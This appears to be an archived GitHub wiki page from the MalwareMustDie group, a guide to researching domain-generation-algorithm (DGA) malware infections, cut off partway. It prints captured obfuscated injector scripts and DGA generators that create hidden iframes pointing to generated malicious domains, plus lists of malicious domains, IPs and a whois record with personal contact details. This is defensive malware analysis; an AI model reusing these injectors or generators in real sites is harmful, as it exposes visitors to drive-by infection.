{ "id": "6cf69879-7e94-4e5a-857f-2aba5120f128", "created_at": "2026-04-06T00:08:47.161842Z", "updated_at": "2026-04-10T13:12:30.343181Z", "deleted_at": null, "sha1_hash": "0f0c4de6c332598a7f3d51403ce07d8b88b19878", "title": "malwaremustdie/wiki/old/DGA_Research_Tips.md at 6f69c8e4a55335b6b60a23785e98087b605ddceb · unixfreaxjp/malwaremustdie", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 125789, "plain_text": "malwaremustdie/wiki/old/DGA_Research_Tips.md at\r\n6f69c8e4a55335b6b60a23785e98087b605ddceb ·\r\nunixfreaxjp/malwaremustdie\r\nBy unixfreaxjp\r\nArchived: 2026-04-05 15:48:36 UTC\r\n#DGA/PseudoRandom Malicious Domain Research Guideline\r\nIntroduction\r\nMost of the openly published of DGA cases solved by MalwareMustDie is compiled as a template to follow in\r\nhere.\r\nDetails\r\nContents\r\nRecognizing\r\nObfuscation\r\nGenerators\r\nDecoding and Reporting\r\nMonitoring an infection\r\nDGA Project Monitoring\r\nThis Research is Copyrighted\r\nRecognizing\r\nDGA can be spotted by a random subdomains or it's randomized parameters as per below sample of infection\r\nroutes, we often spotted them using the free hosting domain, free DDNS, free File Sharing services to camouflage\r\ntheir domain names. The usage of the .ru, .biz,.info base TLD also spotted frequently:\r\n2012-11-15 15:56:55 2 / 0 http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 212.7.194.234\r\n2012-11-15 15:03:46 2 / 0 http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 212.7.194.234\r\n2012-11-15 05:55:18 2 / 0 http://xflonjilx.mynumber.org/geographicallyconquering.cgi?8 212.7.194.235\r\nObfuscation\r\nAs the nature of readable javascript all of the infector using Pseudorandom/DGA code are obfuscated like:\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 1 of 18\n\n<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,\r\n[...]\r\n/*qhk6sa6g1c*/</script>\r\nor..\r\n<script>var var1=true;var var2=10;var2++;var var6=0.0025;if(var6=\r\nar5-=0.022;var var6=5685;var6--}var var5=57;var var8=0;do{var var\r\nr var21=4053;if(var21>0.038){var var17=5470;var17--;var var20=22;\r\nar var32=8980;var32--}function hae(key,mir){var var34=0.031;if(va\r\nr var42=0.009;var42+=0.004;var var43=0;var43+=0.003;var4+='cvCode\r\n :\r\nvar8=4014;if(var8!=3947){var var4=21;if(var4!=0.0116){var var2\r\nar4=0.052;if(var4!=2753){var var2=true;var var3=['apt','gag']}ret\r\n var13=0.017;if(var13!=0){var var12=4296}}}} var str='';functi\r\n','has','ire'];var24++}while(var24\u003c5);return zig} str+=let\r\nr26-=5819;var var27=0.003;var27++}}}var var31=[0,70,50,30,10,20,6\r\n,got,nut){for(var var38=0;var38\u003c9;var38++){var var39=8962;var39++\r\nsr'+'c', 'h00p://'+domainName+'/in.cgi?14'); var var49=4490;var49\r\nifrm.style.visibility='hidden'; var var58='YKtHrZfxVR';\r\nThe above obfuscation mostly lead us to the second or sometimes to the third level of obfuscation, depend on the\r\nnature of infection,i.e. below is the snipped of the second level:\r\ntry {\r\n prototype % 2;\r\n}\r\ncatch (asd){\r\n x = 2;\r\n}\r\ntry {\r\n q = document[(x) ? \"c\" + \"r\" : 2 + \"e\" + \"a\" + \"t\" + \"e\" + \"E\" + \"l\" + \"e\" + \"m\" + ((f) ?\r\n \"e\" + \"n\" + \"t\" : \"\")](\"p\");\r\n q.appendChild(q + \"\");\r\n}\r\ncatch (fwbewe){\r\n i = 0;\r\n try {\r\n prototype * 5;\r\n }\r\n catch (z){\r\n fr = \"fromChar\";\r\n f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660,\r\n 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160,\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 2 of 18\n\n[...]\r\n 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594\r\n , 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205,\r\n 354];\r\n v = \"eva\";\r\n }\r\n if (v)e = window[v + \"l\"];\r\n w = f;\r\n s = [];\r\n r = String;\r\n z = ((e) ? \"Code\" : \"\");\r\n for (;\r\n 1776 - 5 + 5 \u003e i; i += 1){\r\n j = i;\r\n if (e)s = s + r[fr + ((e) ? \"Code\" : 12)]((w[j] / (5 + e(\"j%2\"))));\r\n }\r\n if (f)e(s);\r\nGenerators\r\nWe can decode the below DGA logic generators manually:\r\nType 1\r\n// This typoe is seen only to related PHP/WebShell/IRC-Bit base injected multilayer obfuscation\r\n var time = new Array();\r\n time['year'] = window.gd.getUTCFullYear();\r\n time['month'] = window.gd.getUTCMonth()+1;\r\n time['day'] = window.gd.getUTCDate();\r\n var d='fbcmfir.com';\r\n var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');\r\n var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','\r\n var numbers = new Array(1,2,3,4,5,6,7,8,9);\r\n function CalculateMagicNumber(day, month, year, index)\r\n {\r\n return (((year + (index * day)) + (month ^ day) * index) + day);\r\n }\r\n var yearCh1, yearCh2, monthCh, dayCh, num;\r\n num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);\r\n yearCh1 = letters[(((time['year'] \u0026 0xAA) + num) % 63) % 26] + letters[(((time['year'] \u0026 0xAA) \u003c\u003c 2) + num) %\r\n yearCh2 = letters[((((time['year'] \u0026 0x3311) \u003e\u003e 3) + num) % 10)] + letters[((((time['year'] \u0026 0x3311) \u003e\u003e 4) +\r\n monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];\r\n dayCh = letters[((time['day'] * 6) % 27)];\r\n timeCh = dayCh = letters[((time['day'] * num) % 24)];\r\n $a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 3 of 18\n\nType 2\r\n// This one typically seen over and over\r\nfunction nextRandomNumber(){\r\n var hi = this .seed / this .Q;\r\n var lo = this .seed % this .Q;\r\n var test = this .A * lo - this .R * hi;\r\n if (test \u003e 0){\r\n this .seed = test;\r\n }\r\n else {\r\n this .seed = test + this .M;\r\n }\r\n return (this .seed * this .oneOverM);\r\n}\r\nfunction RandomNumberGenerator(unix){\r\n var d = new Date(unix * 1000);\r\n var s = Math.ceil(d.getHours() / 3);\r\n this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.\r\n round(s * 0xFFF));\r\n this .A = 48271;\r\n this .M = 2147483647;\r\n this .Q = this .M / this .A;\r\n this .R = this .M % this .A;\r\n this .oneOverM = 1.0 / this .M;\r\n this .next = nextRandomNumber;\r\n return this ;\r\n}\r\nfunction createRandomNumber(r, Min, Max){\r\n return Math.round((Max - Min) * r.next() + Min);\r\n}\r\nfunction generatePseudoRandomString(unix, length, zone){\r\n var rand = new RandomNumberGenerator(unix);\r\n var letters = \"qmahgwctopfjilrfpjrfcwgewheizwdw\".split('');\r\n var str = '';\r\n for (var i = 0; i \u003c length; i ++ ){\r\n str += letters[createRandomNumber(rand, 0, letters.length - 1)];\r\n }\r\n return str + '.' + zone;\r\n}\r\nsetInterval(function (){\r\n try {\r\n if (typeof iframeWasCreated == \"undefined\"){\r\n var unix = Math.round( + new Date() / 1000);\r\n var domainName = generatePseudoRandomString(unix, 16, 'mynumber.org');\r\n ifrm = document.createElement(\"IFRAME\");\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 4 of 18\n\nifrm.setAttribute(\"src\", \"h00p://\" + domainName + \"/in(.)cgi?14\");\r\n ifrm.style.width = \"0px\";\r\n ifrm.style.height = \"0px\";\r\n ifrm.style.visibility = \"hidden\";\r\n document.body.appendChild(ifrm);\r\n iframeWasCreated = true;\r\n }\r\nThe above type 2 coded was in the end adopted and used in infamous RunForrestRun DGA gnerator by .RU\r\nmalware infector group.\r\n// This type also commonly used to infect malware site..\r\nfunction nextRandomNumber(){\r\n var hi = this .seed / this .Q;\r\n var lo = this .seed % this .Q;\r\n var test = this .A * lo - this .R * hi;\r\n if (test \u003e 0){\r\n this .seed = test;\r\n }\r\n else {\r\n this .seed = test + this .M;\r\n }\r\n return (this .seed * this .oneOverM);\r\n}\r\nfunction RandomNumberGenerator(unix){\r\n var d = new Date(unix * 1000);\r\n var s = d.getHours() \u003e 12 ? 1 : 0;\r\n this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.\r\n round(s * 0xFFF));\r\n this .A = 48271;\r\n this .M = 2147483647;\r\n this .Q = this .M / this .A;\r\n this .R = this .M % this .A;\r\n this .oneOverM = 1.0 / this .M;\r\n this .next = nextRandomNumber;\r\n return this ;\r\n}\r\nfunction createRandomNumber(r, Min, Max){\r\n return Math.round((Max - Min) * r.next() + Min);\r\n}\r\nfunction generatePseudoRandomString(unix, length, zone){\r\n var rand = new RandomNumberGenerator(unix);\r\n var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o'\r\n , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];\r\n var str = '';\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 5 of 18\n\nfor (var i = 0; i \u003c length; i ++ ){\r\n str += letters[createRandomNumber(rand, 0, letters.length - 1)];\r\n }\r\n return str + '.' + zone;\r\n}\r\nsetTimeout(function (){\r\n try {\r\n if (typeof iframeWasCreated == \"undefined\"){\r\n iframeWasCreated = true;\r\n var unix = Math.round( + new Date() / 1000);\r\n var domainName = generatePseudoRandomString(unix, 16, 'ru');\r\n ifrm = document.createElement(\"IFRAME\");\r\n ifrm.setAttribute(\"src\", \"h00p://\" + domainName + \"/runforestrun?sid=botnet2\");\r\n ifrm.style.width = \"0px\";\r\n ifrm.style.height = \"0px\";\r\n ifrm.style.visibility = \"hidden\";\r\n document.body.appendChild(ifrm);\r\nDecoding and Reporting\r\nIt is important to keep the logic run as per it is to decode which scheme of infection used, our members are\r\nadvised to use the below template:\r\n=======================================\r\n#MalwareMustDie - Case NEW Pseudorandom/DGA domain infectors\r\nSuspected TDS Sutra, followed by @it4sec\r\nsupports: @unifreaxjp, @EricOpdyke\r\nTue Nov 20 15:47:35 JST 2012\r\n=======================================\r\nThe currently registered A record is x.x.x.x\r\nof the below malicious subdomains..\r\n//script result...\r\naaaaa.bbbb.ccc,37.72.188.88,\r\nbbbbb.bbbb.ccc,37.72.188.88,\r\n[...]\r\n// dig confirmation...\r\n;; ANSWER SECTION:\r\nmwwczodfrhwzmetq.mynumber.org. 31 IN A 37.72.188.88\r\ngdrlfielgcoiccjw.mynumber.org. 31 IN A 37.72.188.88\r\ntwtwclwgrdwwpmol.mynumber.org. 31 IN A 37.72.188.88\r\nfjhhtmjlhpdwdwhf.mynumber.org. 31 IN A 37.72.188.88\r\nljimjhilrwgcffgp.mynumber.org. 31 IN A 37.72.188.88\r\ntcpdmfppwgphghej.mynumber.org. 31 IN A 37.72.188.88\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 6 of 18\n\n;; AUTHORITY SECTION:\r\nmynumber.org. 2011 IN NS ns3.changeip.org.\r\nmynumber.org. 2011 IN NS ns2.changeip.org.\r\nmynumber.org. 2011 IN NS ns1.changeip.org.\r\n;; ADDITIONAL SECTION:\r\nns1.changeip.org. 1653 IN A 204.16.173.31\r\nns2.changeip.org. 1822 IN A 204.16.175.12\r\nns3.changeip.org. 1822 IN A 208.85.240.112\r\nns3.changeip.org. 1822 IN A 204.16.175.12\r\n//under below VPS service (whois)\r\ninetnum: 37.72.188.0 - 37.72.188.255\r\nnetname: MNT-WEBEXXPURTS\r\ndescr: Virtual Service Provider\r\ncountry: US\r\nadmin-c: JA3035-RIPE\r\ntech-c: JA3035-RIPE\r\nstatus: ASSIGNED PA\r\nmnt-by: MNT-WEBEXXPURTS\r\nsource: RIPE # Filtered\r\nmnt-routes: GLESYS-MNT\r\nremarks: INFRA-AW\r\nperson: Jay Anderson\r\naddress: 100 Technology Dr\r\naddress: Asheville\r\naddress: North Carolina\r\naddress: 28803\r\nmnt-by: MNT-WEBEXXPURTS\r\nremarks: USA\r\nphone: +14086774567\r\nnic-hdl: JA3035-RIPE\r\nsource: RIPE # Filtered\r\n// REFERENCING IS A MUST!\r\n// reference of that IP is not good, another infector URL detected\r\n// Base: http://urlquery.net/report.php?id=179086\r\n----------------------------------------------------------------------------\r\nDate (CET) Rep/Alerts/IDS URL IP\r\n----------------------------------------------------------------------------\r\n2012-11-17 22:26:06 / 2 / 0 http://mwwczodfrhwzmetq.mynumber.org/in.cgi?14 37.72.188.88 [Esto\r\n↑\r\n//urlQuery Alerts Detected a Dynamic DNS URL\r\n//Detected SutraTDS URL pattern\r\n//Same ASN also have other TDS Sultra infectors:\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 7 of 18\n\n2012-11-15 09:24:39 1 / 2 http://creofdjwwpgdteoc.ru/in.cgi?17 --\u003e http://urlquery.net/report.php?id=1\r\n2012-11-15 08:56:12 1 / 2 http://mwcwcrhwwmlwhqdz.ru/in.cgi?17 --\u003e http://urlquery.net/report.php?id=1\r\n// PseudoRandom/DGA Generator logic used (A MUST)...\r\nhttp://pastebin.com/raw.php?i=EAHfMktC\r\n/ Raw data checked:\r\nDATE TIME CRACKED URL\r\n-------------------------------------------------------\r\nThu Jan 01 01:00:00 GMT-0500 (Eastern Standard Time) h00p://pheorwhhtffpfcrz.mynumber.org/in.cgi?14\r\nThu Jan 01 04:00:00 GMT-0500 (Eastern Standard Time) h00p://rplfthpdrifjzrwm.mynumber.org/in.cgi?14\r\nThu Jan 01 07:00:00 GMT-0500 (Eastern Standard Time) h00p://wfqgawgahlwwewjp.mynumber.org/in.cgi?14\r\nThu Jan 01 10:00:00 GMT-0500 (Eastern Standard Time) h00p://wwricgrzwriwzlpc.mynumber.org/in.cgi?14\r\nThu Jan 01 13:00:00 GMT-0500 (Eastern Standard Time) h00p://iiwhjwldchjzwwwh.mynumber.org/in.cgi?14\r\nThu Jan 01 16:00:00 GMT-0500 (Eastern Standard Time) h00p://daeocmcawpzpjizp.mynumber.org/in.cgi?14\r\nThu Jan 01 19:00:00 GMT-0500 (Eastern Standard Time) h00p://ajlgqgeodcifefje.mynumber.org/in.cgi?14\r\nThu Jan 01 22:00:00 GMT-0500 (Eastern Standard Time) h00p://wjqdfrretghwhpwr.mynumber.org/in.cgi?14\r\n[...]\r\n// Template source:\r\n#MalwareMustDie | Case Pseudorandom/DGA domain infectors..\r\n@EricOpdyke @unixfreaxjp supporting to: @it4sec's http://ondailybasis.com/blog/?p=1668\r\nSample Published Reports\r\nhttp://pastebin.com/raw.php?i=BXYvTK8Q\r\nhttp://pastebin.com/raw.php?i=S0cs87P1\r\nhttp://pastebin.com/raw.php?i=VvQAk9m1\r\n(See our Pastebin for more...)\r\nMonitoring an infection\r\nIt is important to keep on monitoring the DGA after spotted. The point of monitoring are:\r\n * Which domains are up (WHOIS + A RECORD)?\r\n * Which ones are actually blocked?\r\n * Which ones are are up but not weaponized (WHOIS - A RECORD)\r\n * Monitoring the Status of the Registrar record in WHOIS\r\nBelow is sample of our reporting/monitoring on published cases:\r\n==========================================================\r\n#MalwareMustDie - DGA/Pseudorandom Case: RunForrestRun/JS\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 8 of 18\n\nRaw: http://pastebin.com/raw.php?i=9zQt23hv\r\nPS: PseudoRandom burped double domains\r\nso all domains in this report will be doubled too...\r\n===========================================================\r\n=========================\r\nALREADY BLOCKED\r\n=========================\r\nghwjfwfcwtdawjge.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nwwjfgirarcmiwclw.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nicqedhlgjwpcwfip.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nicqedhlgjwpcwfip.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\ngpzweeqgjphipzrp.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nhffzjifwffezajwt.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nzwagmecepfgjafep.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nwicpcczejpdwmwez.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nagfwfjpzhtijddat.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nagfwfjpzhtijddat.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nwfzzcwgghwffwjpr.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nopfwcwlowhzdizia.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\njgaihfhgjlqhjwff.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nrzcjlpfzfjjwpjwi.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\noqcrhfchlwzwhzcq.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\noqcrhfchlwzwhzcq.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nghwjfwfcwtdawjge.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nwwjfgirarcmiwclw.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nicqedhlgjwpcwfip.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nopfwcwlowhzdizia.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\njgaihfhgjlqhjwff.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nrzcjlpfzfjjwpjwi.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\noqcrhfchlwzwhzcq.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\n=======================================\r\nREGISTERED DOMAINS WITHOUT A RECORDS\r\n======================================\r\nriwecppzhljhiqjc.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njrjhjwipwdihtlwi.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncwwtcajagocwfpcw.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nriwecppzhljhiqjc.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njrjhjwipwdihtlwi.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncwwtcajagocwfpcw.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 9 of 18\n\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\newcgcgwgofpcczth.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzjwioaedtwtejajg.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nerwwmafwpwwmpgjh.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nweewfpjjtjrgrcht.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nmgpcgicwhwzezgpj.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ngfhidjejiwjdgfda.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nlidgegrragewhdqt.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nfrjwdrfjwwwreife.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwgwziiwgrwciwct.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwgwziiwgrwciwct.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwdgffiapcrhpgcch.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwwirfwqfiwizzgtt.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nijdewiritmhcqhcz.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwricfffjewcmricg.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwcrigpfcprwclcia.info,,NS1.SILENTDNS.COM, NS2.SILENTDNS.COM\r\nappejljrdtjqgdff.info,,NS1.SILENTDNS.COM\r\nwfiioccfoijpqhpr.info,,NS1.SILENTDNS.COM\r\nowrgrdtrfggfwjig.info,,NS1.SILENTDNS.COM\r\nowrgrdtrfggfwjig.info,,NS1.SILENTDNS.COM\r\nawjmfoihgzfgtgpi.info,,NS1.SILENTDNS.COM\r\nwdwwjrqacqdecfjw.info,,NS1.SILENTDNS.COM\r\nowrlcpcpgfiwhcww.info,,NS1.SILENTDNS.COM\r\njjwcrdfwhhtpwotf.info,,NS1.SILENTDNS.COM\r\nrjehlwpqjzrcfewl.info,,NS1.SILENTDNS.COM\r\nrjehlwpqjzrcfewl.info,,NS1.SILENTDNS.COM\r\njefaglhpiogipgpz.info,,NS1.SILENTDNS.COM\r\nggjrhwfecfwogffo.info,,NS1.SILENTDNS.COM\r\nhfgwlfpizfwottcr.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nclmrcwwhfdqghjgl.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nclmrcwwhfdqghjgl.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neffehilmhgctrpia.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhhcdlfccqftweeew.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\n----------------------------------------------------------------\r\n↓ H I G H L Y S U S P E C T E D M A L W A R E H O S T S\r\n S O R T E D P E R I P A D D R E S S\r\n S a t N o v 3 1 6 : 4 1 : 1 9 J S T 2 0 1 2\r\n----------------------------------------------------------------\r\n==================\r\n188.40.204.64\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 10 of 18\n\n==================\r\nfipdipirewfiihrf.info,188.40.204.64,\r\nrrigjzewrwjiwdci.info,188.40.204.64,\r\nfipdipirewfiihrf.info,188.40.204.64,\r\nrrigjzewrwjiwdci.info,188.40.204.64,\r\n==================\r\n91.233.244.102\r\n==================\r\nigicpiipggljcwaf.info,91.233.244.102,DNS1.WEBDRIVE.RU, DNS2.WEBDRIVE.RU\r\nigicpiipggljcwaf.info,91.233.244.102,DNS1.WEBDRIVE.RU, DNS2.WEBDRIVE.RU\r\n==================\r\n208.91.197.193\r\n==================\r\necwwmwiorimiwjpg.info,208.91.197.193,\r\nrjwweohfoepeggaj.info,208.91.197.193,\r\necwwmwiorimiwjpg.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM, SK.S5.ANS2.NS112.ZTOMY.COM\r\nrjwweohfoepeggaj.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM, SK.S5.ANS2.NS112.ZTOMY.COM\r\necwwmwiorimiwjpg.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM,SK.S5.ANS2.NS112.ZTOMY.COM\r\nrjwweohfoepeggaj.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM,SK.S5.ANS2.NS112.ZTOMY.COM\r\n==================\r\n62.116.181.25\r\n==================\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\ngcggtfilfgiiwdfw.info,62.116.181.25,\r\ncegprccwldejfwfw.info,62.116.181.25,\r\npmjjzpcerwcagtpc.info,62.116.181.25,\r\nitwgpwjifrzoajco.info,62.116.181.25,\r\nrfhwhftjormwjzfj.info,62.116.181.25,\r\nwhwfcjiwplgmriew.info,62.116.181.25,\r\nfzrttttthlzcewjd.info,62.116.181.25,\r\nrhofafmfwfgwwgpw.info,62.116.181.25,\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\ngcggtfilfgiiwdfw.info,62.116.181.25,\r\ncegprccwldejfwfw.info,62.116.181.25,\r\npmjjzpcerwcagtpc.info,62.116.181.25,\r\nitwgpwjifrzoajco.info,62.116.181.25,\r\nrfhwhftjormwjzfj.info,62.116.181.25,\r\nwhwfcjiwplgmriew.info,62.116.181.25,\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 11 of 